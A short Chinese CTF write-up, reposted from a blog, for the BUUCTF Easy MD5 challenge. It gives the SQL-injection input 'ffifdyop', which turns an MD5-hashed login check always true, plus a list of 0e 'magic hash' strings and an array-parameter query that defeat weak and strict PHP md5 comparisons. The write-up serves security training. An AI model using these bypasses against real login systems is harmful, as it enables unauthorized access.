BUUCTF [BJDCTF2020]Easy MD5 wp
作者:互联网
[BJDCTF2020]Easy MD5
点击进行去后,看到有输入框。随便输入一串,并没有结果回显,查看数据包
提示进行了md5加密
这里有一个神奇的字符串,
ffifdyop
由于数据库mysql会将md5加密后的hex值转换成字符串再执行,但这个字符串加密后再转字符串就是
'or'6�]��!r,��b
条件恒真
129581926211651571912466741651878684928
也有同效
登陆后,
查看源码
这是一个弱类型的MD5碰撞,
QNKCDZO
0e830400451993494058024219903391
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
常见的有上述这些,原理是当加密后,首字几个为0e,会被当成科学计数法,而0的几次方都是0。
在跳转到这里,
这里则是md5的强对撞,使用数组类型可绕过
?param1[]=111¶m2[]=222
标签:s214587387a,BUUCTF,加密,s878926199a,Easy,wp,字符串,md5,MD5 来源: https://www.cnblogs.com/Hankysblogs/p/15314916.html